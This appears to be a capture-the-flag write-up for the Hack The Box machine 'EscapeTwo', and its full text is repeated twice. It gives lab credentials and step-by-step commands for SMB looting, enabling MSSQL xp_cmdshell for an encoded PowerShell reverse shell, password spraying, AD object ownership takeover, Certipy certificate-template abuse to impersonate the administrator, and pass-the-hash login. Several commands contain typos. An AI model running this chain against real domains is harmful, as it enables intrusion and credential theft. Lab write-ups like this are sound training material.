EscapeTwo AD

Machine Information

The initial access was straightforward, as the machine's description provided a username and password. Using these credentials, further enumeration was performed with crackmapexe to discover additional users. File shares were also checked for readable content, leading to an SMB share that contained an XLS file. Upon inspection, the file held credentials for another user.

The most interesting service was MSSQL, which was leveraged using Impacket to extract configuration files, revealing another password. A password spray attack with crackmapexe helped identify the corresponding user.

For privilege escalation, the user had Active Directory Rights Overwrite privileges. By assigning Ryan to this privilege and using Certipy, administrative access was obtained, leading to full system compromise.

Challenge Information

Name: EscapeTwo
Platform: Hack The Box (HTB)
Category: Active Directory (Windows)
Difficulty: Easy
Objective: Exploit Active Directory to retrieve the flag.
Tags: smbclient, evil-winrm, certipy
Key Exploit: Active Directory Rights Overwrite

Machine Information

IP Address: 10.10.11.51
Domain: sequel.htb
Domain Controller: DC01.sequel.htb
Initial Credentials: rose / KxEPkKe6R8su

Enumeration

nmap

A full port scan was conducted to identify open services.

nmap -sC -sV -p- 10.10.11.51

Discovered Open Ports & Services:

Port

Service

Description

DNS

Domain Name System

Kerberos

Authentication Service

135

RPC

Remote Procedure Call

139

NetBIOS

File Sharing Service

389

LDAP

Active Directory Queries

445

SMB

File Share Access

1433

MSSQL

Microsoft SQL Server 2019

5985

WinRM

Windows Remote Management

Key Finding:
The machine is part of an Active Directory domain: sequel.htb.
A Microsoft SQL Server 2019 instance is running.
SMB and LDAP services indicate potential credential leaks.

Before proceeding with enumeration and exploitation, add the target machine’s IP and domain name to /etc/hosts for easier interaction with services.

echo "10.10.11.51 sequel.htb dc01.sequel.htb" | sudo tee -a /etc/hosts

Initial Access

The challenge description provided the initial credentials:

Username: rose  
Password: KxEPkKe6R8su

Using crackmapexec, additional enumeration was performed.

nxc smb sequel.htb -u 'rose' -p 'KxEPkKe6R8su' --shares

SMB Enumeration

The Accounting Department SMB share contained an XLS file, which was retrieved and analyzed.

smbclient \\sequel.htb\Accounting Department -U rose
mget *

By extracting the contents of the XLS file, additional credentials were discovered:

angela : 0fwz7Q4mSpurIt99  
oscar : 86LxLBMgEWaKUnBG  
kevin : Md9Wlq1E5bZnVDVo  
sa : MSSQLP@ssw0rd!

Exploiting MSSQL for Shell Access

According to the MS documentation, xp_cmdshell spawns a Windows command shell and passes in a string for execution. Any output is returned as rows of text.

xp_cmdshell { 'command_string' } [ , NO_OUTPUT ]

Using impacket-mssqlclient, a connection was established using the extracted sa credentials.

impacket-mssqlclient sa:"password"@sequel.htb

Enabling xp_cmdshell

The xp_cmdshell feature was enabled to execute system commands.

EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

Gaining a Reverse Shell

A PowerShell reverse shell was executed using Nishang.

With an active shell, further enumeration led to the discovery of SQL2019 configuration files, which contained plaintext credentials.

xp_cmdshell 'powershell -enc <<base64_payload>>'

Privilege Escalation – Active Directory Rights Overwrite

Identifying New Credentials

After obtaining a new set of credentials, a password-spraying attack using crackmapexec identified the associated user:

crackmapexec smb sequel.htb -u all_users.txt -p 'WqSZAF6CysDQbGb3'

Identifying Privileges

Using PowerView, Ryan’s privileges were examined:

Get-DomainUser -Identity ryan -Select ObjectSid
Get-DomainObjectAcl -ResolveGUIDs -SecurityIdentifier S-1-5-21-548670397-972687484-3496335370-1114

Ryan had Active Directory Rights Overwrite privileges, which allowed control over the ca_svc account.

Assigning Ryan as Owner

Assign Ryan as ownership in ca_svc account.

Set-DomainObjectOwner -TargetIdentity ca_svc -PrincipalIdentity ryan
Add-DomainObjectAcl -TargetIdentity ca_svc -PrincipalIdentity ryan -Rights fullcontro

As clean-up script from the machine, need to re-run this step multiple times.

Certificate-Based Authentication (Certipy)

With ca_svc access, Certipy was used to request a certificate for administrator authentication.

certipy-ad shadow auto -u ryan@sequel.htb -p 'WqSZAF6CysDQbGb3' -dc-ip 10.10.11.51 -ns 10.10.11.51 -target dc01.sequel.htb -account ca_svc

Fix this using,

in root term >> timedatectl set-ntp off; ntpdate {dc_ip}

Re-run the ownership assignment:

KRB5CCNAME=$PWD/ca_svc.ccache certipy-ad find -scheme ldap -k -debug -target dc01.sequel.htb -dc-ip 10.10.11.51 -vulnerable -stdout
KRB5CCNAME=$PWD/ca_svc.ccache certipy-ad template -k -template DunderMifflinAuthentication -target dc01.sequel.htb -dc-ip 10.10.11.51

Requesting a Certificate for Administrator Access

certipy-ad req -u ca_svc -hashes '3b181b914e7a9d5508ea1e20bc2b7fce' -ca sequel-DC01-CA -target sequel.htb -dc-ip 10.10.11.51 -template DunderMifflinAuthentication -upn administrator@sequel.htb -ns 10.10.11.51 -dns 10.10.11.51 -debug

Authenticating as Administrator

certipy-ad auth -pfx ./administrator_10.pfx -dc-ip 10.10.11.51

Using Evil-WinRM, administrator access was established:

evilwinrm -i dc01.sequel.htb -i administrator -H {admin_hash}

Conclusion

This machine demonstrated the importance of securing Active Directory Certificate Services (ADCS) and MSSQL xp_cmdshell. Key takeaways:

Avoid embedding plaintext credentials in files.
Restrict SMB access to authenticated and authorized users.
Disable unnecessary SQL Server features like xp_cmdshell.
Monitor Active Directory rights assignments, especially over critical accounts.

This was an engaging Active Directory exploitation challenge that emphasized SMB enumeration, password spraying, SQL abuse, and AD certificate misconfigurations.

Last updated 5 days ago

EscapeTwo AD

Machine Information

Challenge Information

Name: EscapeTwo
Platform: Hack The Box (HTB)
Category: Active Directory (Windows)
Difficulty: Easy
Objective: Exploit Active Directory to retrieve the flag.
Tags: smbclient, evil-winrm, certipy
Key Exploit: Active Directory Rights Overwrite

Machine Information

IP Address: 10.10.11.51
Domain: sequel.htb
Domain Controller: DC01.sequel.htb
Initial Credentials: rose / KxEPkKe6R8su

Enumeration

nmap

A full port scan was conducted to identify open services.

nmap -sC -sV -p- 10.10.11.51

Discovered Open Ports & Services:

Port

Service

Description

DNS

Domain Name System

Kerberos

Authentication Service

135

RPC

Remote Procedure Call

139

NetBIOS

File Sharing Service

389

LDAP

Active Directory Queries

445

SMB

File Share Access

1433

MSSQL

Microsoft SQL Server 2019

5985

WinRM

Windows Remote Management

Key Finding:
The machine is part of an Active Directory domain: sequel.htb.
A Microsoft SQL Server 2019 instance is running.
SMB and LDAP services indicate potential credential leaks.

Before proceeding with enumeration and exploitation, add the target machine’s IP and domain name to /etc/hosts for easier interaction with services.

echo "10.10.11.51 sequel.htb dc01.sequel.htb" | sudo tee -a /etc/hosts

Initial Access

The challenge description provided the initial credentials:

Username: rose  
Password: KxEPkKe6R8su

Using crackmapexec, additional enumeration was performed.

nxc smb sequel.htb -u 'rose' -p 'KxEPkKe6R8su' --shares

SMB Enumeration

The Accounting Department SMB share contained an XLS file, which was retrieved and analyzed.

smbclient \\sequel.htb\Accounting Department -U rose
mget *

By extracting the contents of the XLS file, additional credentials were discovered:

angela : 0fwz7Q4mSpurIt99  
oscar : 86LxLBMgEWaKUnBG  
kevin : Md9Wlq1E5bZnVDVo  
sa : MSSQLP@ssw0rd!

Exploiting MSSQL for Shell Access

According to the MS documentation, xp_cmdshell spawns a Windows command shell and passes in a string for execution. Any output is returned as rows of text.

xp_cmdshell { 'command_string' } [ , NO_OUTPUT ]

Using impacket-mssqlclient, a connection was established using the extracted sa credentials.

impacket-mssqlclient sa:"password"@sequel.htb

Enabling xp_cmdshell

The xp_cmdshell feature was enabled to execute system commands.

EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

Gaining a Reverse Shell

A PowerShell reverse shell was executed using Nishang.

With an active shell, further enumeration led to the discovery of SQL2019 configuration files, which contained plaintext credentials.

xp_cmdshell 'powershell -enc <<base64_payload>>'

Privilege Escalation – Active Directory Rights Overwrite

Identifying New Credentials

After obtaining a new set of credentials, a password-spraying attack using crackmapexec identified the associated user:

crackmapexec smb sequel.htb -u all_users.txt -p 'WqSZAF6CysDQbGb3'

Identifying Privileges

Using PowerView, Ryan’s privileges were examined:

Get-DomainUser -Identity ryan -Select ObjectSid
Get-DomainObjectAcl -ResolveGUIDs -SecurityIdentifier S-1-5-21-548670397-972687484-3496335370-1114

Ryan had Active Directory Rights Overwrite privileges, which allowed control over the ca_svc account.

Assigning Ryan as Owner

Assign Ryan as ownership in ca_svc account.

Set-DomainObjectOwner -TargetIdentity ca_svc -PrincipalIdentity ryan
Add-DomainObjectAcl -TargetIdentity ca_svc -PrincipalIdentity ryan -Rights fullcontro

As clean-up script from the machine, need to re-run this step multiple times.

Certificate-Based Authentication (Certipy)

With ca_svc access, Certipy was used to request a certificate for administrator authentication.

certipy-ad shadow auto -u ryan@sequel.htb -p 'WqSZAF6CysDQbGb3' -dc-ip 10.10.11.51 -ns 10.10.11.51 -target dc01.sequel.htb -account ca_svc

Fix this using,

in root term >> timedatectl set-ntp off; ntpdate {dc_ip}

Re-run the ownership assignment:

KRB5CCNAME=$PWD/ca_svc.ccache certipy-ad find -scheme ldap -k -debug -target dc01.sequel.htb -dc-ip 10.10.11.51 -vulnerable -stdout
KRB5CCNAME=$PWD/ca_svc.ccache certipy-ad template -k -template DunderMifflinAuthentication -target dc01.sequel.htb -dc-ip 10.10.11.51

Requesting a Certificate for Administrator Access

Authenticating as Administrator

certipy-ad auth -pfx ./administrator_10.pfx -dc-ip 10.10.11.51

Using Evil-WinRM, administrator access was established:

evilwinrm -i dc01.sequel.htb -i administrator -H {admin_hash}

Conclusion

This machine demonstrated the importance of securing Active Directory Certificate Services (ADCS) and MSSQL xp_cmdshell. Key takeaways:

Avoid embedding plaintext credentials in files.
Restrict SMB access to authenticated and authorized users.
Disable unnecessary SQL Server features like xp_cmdshell.
Monitor Active Directory rights assignments, especially over critical accounts.

This was an engaging Active Directory exploitation challenge that emphasized SMB enumeration, password spraying, SQL abuse, and AD certificate misconfigurations.

Last updated 5 days ago